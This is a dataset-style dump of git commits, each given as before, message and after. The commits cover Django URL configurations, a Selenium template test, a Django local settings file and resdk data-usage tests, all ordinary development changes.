)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| <commit_before>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
<commit_msg>Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org><commit_after> | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| <commit_before>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
<commit_msg>Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org><commit_after>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
|
2336a72c878a58ef8a3a1f47f6ecf9ee9574feca | project_name/project_name/urls.py | project_name/project_name/urls.py | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | Update url pattern syntax for django 1.10 | Update url pattern syntax for django 1.10
| Python | mit | tom-henderson/django-template,tom-henderson/django-template | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)Update url pattern syntax for django 1.10 | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | <commit_before>from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)<commit_msg>Update url pattern syntax for django 1.10<commit_after> | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)Update url pattern syntax for django 1.10from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | <commit_before>from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)<commit_msg>Update url pattern syntax for django 1.10<commit_after>from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
7ec478f769350485b6c468308f0785e1d45b0fa8 | testmodel/webapp/selenium/test/templates-test.py | testmodel/webapp/selenium/test/templates-test.py | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| Use the same app as deployed by the setup script | Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c | Python | lgpl-2.1 | julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| <commit_before>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
<commit_msg>Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c<commit_after> | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275cimport unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| <commit_before>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
<commit_msg>Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c<commit_after>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
|
470752a778476d27fd5f13445b8cd8a79b722591 | cfgov/cfgov/settings/local.py | cfgov/cfgov/settings/local.py | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| Allow init_command to be set by env | Allow init_command to be set by env
| Python | cc0-1.0 | kave/cfgov-refresh,kave/cfgov-refresh,kave/cfgov-refresh,kave/cfgov-refresh | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
Allow init_command to be set by env | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| <commit_before>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
<commit_msg>Allow init_command to be set by env<commit_after> | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
Allow init_command to be set by envfrom .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| <commit_before>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
<commit_msg>Allow init_command to be set by env<commit_after>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
|
a56b69ef48acb0badf04625650dfdc25d1517a81 | resdk/tests/functional/resolwe/e2e_resolwe.py | resdk/tests/functional/resolwe/e2e_resolwe.py | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| Support collection statistics in data usage tests | Support collection statistics in data usage tests
| Python | apache-2.0 | genialis/resolwe-bio-py | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
Support collection statistics in data usage tests | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
